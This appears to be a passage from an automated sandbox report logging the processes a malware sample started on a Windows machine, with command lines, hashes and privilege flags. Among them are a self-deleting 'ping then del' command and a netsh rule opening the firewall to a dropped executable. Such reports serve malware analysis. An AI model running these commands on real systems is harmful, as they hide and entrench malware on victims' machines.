                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                                          Start time:06:41:40
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline: /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE"
                                                                                                                                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                                                          Start time:06:41:40
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                                                          Start time:06:41:40
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                                                                                                                                          Imagebase:0x220000
                                                                                                                                                                                                                                                                                          File size:18'944 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                                                                          Start time:06:41:42
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline: /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                                          Start time:06:41:42
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                                                          Start time:06:41:42
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x1200000
                                                                                                                                                                                                                                                                                          File size:82'432 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                                                          Start time:06:41:43
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x970000
                                                                                                                                                                                                                                                                                          File size:2'496'512 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:FA45B9C5E2A92B1B3D7D175C23FFC813
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                                                          Start time:06:41:45
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\sihost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:sihost.exe
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff700bc0000
                                                                                                                                                                                                                                                                                          File size:111'616 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                                                          Start time:06:41:47
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                                                          Start time:06:41:47
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                                                                          Start time:06:41:48
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\ctfmon.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"ctfmon.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7a3870000
                                                                                                                                                                                                                                                                                          File size:11'264 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                                                                          Start time:06:41:51
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff633410000
                                                                                                                                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                                                          Start time:06:41:56
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x970000
                                                                                                                                                                                                                                                                                          File size:2'496'512 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:FA45B9C5E2A92B1B3D7D175C23FFC813
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                                                          Start time:06:42:02
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                                                                          Start time:06:42:05
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff663e30000
                                                                                                                                                                                                                                                                                          File size:793'416 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                                                                          Start time:06:42:10
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff73df00000
                                                                                                                                                                                                                                                                                          File size:103'288 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                                                                          Start time:06:42:11
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7df7f0000
                                                                                                                                                                                                                                                                                          File size:3'671'400 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                                                          Start time:06:43:58
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff73df00000
                                                                                                                                                                                                                                                                                          File size:103'288 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                                                                          Start time:06:44:06
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff73df00000
                                                                                                                                                                                                                                                                                          File size:103'288 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                                                                          Start time:06:44:08
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\smartscreen.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d8c90000
                                                                                                                                                                                                                                                                                          File size:2'378'752 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                                                                          Start time:06:44:21
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\ApplicationFrameHost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff674640000
                                                                                                                                                                                                                                                                                          File size:78'456 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                                                                          Start time:06:44:47
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff61dec0000
                                                                                                                                                                                                                                                                                          File size:19'456 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:6C44453CD661FC2DB18E4C09C4940399
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                                                                          Start time:06:44:52
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff73df00000
                                                                                                                                                                                                                                                                                          File size:103'288 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                                                                          Start time:06:44:53
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6668d0000
                                                                                                                                                                                                                                                                                          File size:19'232 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                                                                          Start time:06:45:02
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                                                                          Start time:06:45:07
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0x4
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                                                                          Start time:06:45:12
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0xa90000
                                                                                                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                                                                          Start time:06:45:12
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0xa90000
                                                                                                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                                                                                                                          Start time:06:45:12
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0xa90000
                                                                                                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                                                                          Start time:06:45:12
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0xa90000
                                                                                                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                                                                                                                          Start time:06:45:18
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
